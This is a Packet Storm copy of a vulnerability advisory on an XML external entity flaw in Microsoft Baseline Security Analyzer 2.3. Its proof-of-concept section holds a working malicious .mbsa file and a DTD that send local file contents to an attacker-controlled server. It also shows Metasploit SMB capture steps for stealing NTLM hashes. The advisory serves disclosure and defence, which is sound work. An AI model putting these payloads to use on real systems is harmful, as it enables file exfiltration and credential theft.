exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Baseline Security Analyzer 2.3 XML Injection

Microsoft Baseline Security Analyzer 2.3 XML Injection
Posted Sep 10, 2018
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Microsoft Baseline Security Analyzer version 2.3 suffers from an XML external entity injection vulnerability.

tags | exploit
SHA-256 | 93c391e34088d358a2e2c716523db9450646ff3ced21181d0a85858a46bc542d

Microsoft Baseline Security Analyzer 2.3 XML Injection

Change Mirror Download
[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt
[+] ISR: Apparition Security
[+] Zero Day Initiative Program


[Vendor]
www.microsoft.com


[Product]
Microsoft Baseline Security Analyzer v2.3

Microsoft Baseline Security Analyzer (MBSA) is a software tool released by Microsoft to determine security state by assessing missing security updates and less-secure
security settings within Microsoft Windows, Windows components such as Internet Explorer, IIS web server, and products Microsoft SQL Server, and Microsoft Office macro settings.


[Vulnerability Type]
XML External Entity Injection


[ZDI Reference]
ZDI-CAN-6307


[Security Issue]
Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker controlled server if a user opens a specially crafted ".mbsa" file.



[Exploit/POC]

Install MBSA

https://www.microsoft.com/en-us/download/details.aspx?id=7558

1) "evil.mbsa"

<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

2) "payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

When victim attempts open file they get prompted "Do you want to let this app make changes to your device?"
However, it also indicates it is a "verified publisher" namely Microsoft. After opening the local users files can be exfiltrated to a remote server.
Moreover, we can use this to steal NTLM hashes.

Using Forced Authentication to steal NTLM hashes

2) msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit -j

"evil.mbsa"

<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % dtd SYSTEM "\\192.168.114.153\unknwonfilez">
%dtd;]>

Result: credentials captured by remote sever



[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
Vendor reply: Program deprecated
September 8, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close